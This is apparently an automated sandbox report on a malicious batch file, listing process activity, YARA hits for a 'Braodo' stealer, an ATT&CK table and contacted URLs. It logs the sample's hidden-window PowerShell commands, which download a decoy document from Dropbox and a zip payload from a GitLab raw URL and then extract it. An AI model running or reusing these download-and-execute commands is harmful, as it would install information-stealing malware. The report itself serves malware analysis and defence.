              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4208Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5638Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5199Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1114Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5588Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3157Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3994Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2366Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3599Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep count: 4208 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep count: 5638 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep count: 5199 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep count: 1114 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep count: 5588 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep count: 3157 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep count: 3994 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep count: 2366 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448Thread sleep count: 3599 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448Thread sleep count: 237 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE21C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
              Source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_2352.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi64_4336.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2352, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4336, type: MEMORYSTR
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I set "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I goto "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I echo "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I pause "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'c:\users\user\appdata\local\temp\\12_advertising_campaign_and_collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip', 'c:\users\public\document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'c:\users\user\appdata\local\temp\\12_advertising_campaign_and_collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip', 'c:\users\public\document.zip')"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Braodo
              Source: Yara matchFile source: amsi64_1292.amsi.csv, type: OTHER

              Remote Access Functionality

              barindex
              Yara detected Braodo
              Source: Yara matchFile source: amsi64_1292.amsi.csv, type: OTHER

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts1
              Command and Scripting Interpreter              		11
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              13jhsfbose.bat12%ReversingLabs
              13jhsfbose.bat8%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com0%Avira URL Cloudsafe
              https://sales.dropboxbusiness.com/0%Avira URL Cloudsafe
              https://www.hellofax.com/0%Avira URL Cloudsafe
              https://www.hellosign.com/0%Avira URL Cloudsafe
              https://instructorledlearning.dropboxbusiness.com/100%Avira URL Cloudphishing
              http://www.micrSystem.resourcesA_2009-04-02.crt00%Avira URL Cloudsafe
              https://a.sprig.com/0%Avira URL Cloudsafe
              https://navi.dropbox.jp/0%Avira URL Cloudsafe
              https://officeapps-df.live.com0%Avira URL Cloudsafe
              https://sentry.gitlab.net0%Avira URL Cloudsafe
              https://gitlab.com(0%Avira URL Cloudsafe
              https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/document/fsip/0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/spreadsheets/fsip/0%Avira URL Cloudsafe
              https://customers.gitlab.com0%Avira URL Cloudsafe
              https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com/cd/0/get/Cel62Zb6Z6skuFAMIcLW6_-9x9nN0%Avira URL Cloudsafe
              https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/0%Avira URL Cloudsafe
              https://selfguidedlearning.dropboxbusiness.com/0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/presentation/fsip/0%Avira URL Cloudsafe
              https://app.hellofax.com/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              edge-block-www-env.dropbox-dns.com
              		162.125.66.15
              		truefalse
                		high
                gitlab.com
                		172.65.251.78
                		truefalse
                  		high
                  www-env.dropbox-dns.com
                  		162.125.66.18
                  		truefalse
                    		high
                    ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.dropbox.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://gitlab.com/users/sign_infalse
                          		high
                          https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zipfalse
                            		high
                            https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://gitlab.compowershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://paper.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.hellofax.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
